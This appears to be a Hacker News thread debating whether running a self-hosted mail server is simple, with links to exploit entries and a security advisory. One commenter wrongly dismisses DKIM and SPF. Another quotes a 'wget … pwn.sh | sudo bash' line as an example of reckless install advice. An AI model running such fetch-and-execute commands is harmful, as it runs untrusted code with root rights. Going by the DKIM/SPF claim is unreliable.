3 ms·
Where do people get these misguided notions about email? You don't need dkim or spf at all, few people check either, and they are just to prevent backscatter.
by asdasf 13y ago
Where do people get these misguided notions about email? You don't need dkim or spf at all, few people check either, and they are just to prevent backscatter. Running your own mail server is trivially easy.
- escapologybb 13y agoCan you point to a trivially easy set of instructions please? ;-)
- sdegutis 13y agoAnd to some document giving confidence that it wouldn't be dangerously insecure or vulnerable to common threats?
- alextingle 13y agohttps://wiki.debian.org/Exim https://wiki.debian.org/Exim
- asdasf 13y agoapt-get install postfix openldap dovecot I really don't know what the deal is with email, but since the mid 90s there's been this weird thing where everyone wants to follow some kind of step by step guide. But it is just simple software like anything else. If you can setup a webserver or a database server or anything else you can setup a mail server.
- shiftpgdn 13y agoSorry but that's not true at all. DKIM keys, spf records and gmail: https://support.google.com/mail/answer/81126?hl=en https://support.google.com/mail/answer/81126?hl=en Recent Exim exploit: http://www.exploit-db.com/exploits/25970/ http://www.exploit-db.com/exploits/25970/ Dovecot exploit: https://www.rapid7.com/db/modules/exploit/linux/smtp/exim4_dovecot_exec https://www.rapid7.com/db/modules/exploit/linux/smtp/exim4_d... I found a few Sendmail exploits as well but nothing from this year. Sure this stuff is easy to install but there is a reason managed email exists.
- asdasf 13y agoIf you are going to say "that's not true at all" you need to present an argument for why I am wrong. You posted something completely irrelevant, and a couple of exploits. There are security vulnerabilities found in all kinds of software, so what?
- e12e 13y agoThat "Exim exploit"-link is a little misleading -- that's not a bug in the software, but in (third party) documentation: https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0... By that metric all software on your servers are insecure (consider the number of "just do: 'wget http://trollol.com/pwn.sh|sudo http://trollol.com/pwn.sh|sudo bash -'"-type advice you find looking at install-instruction for random github projects).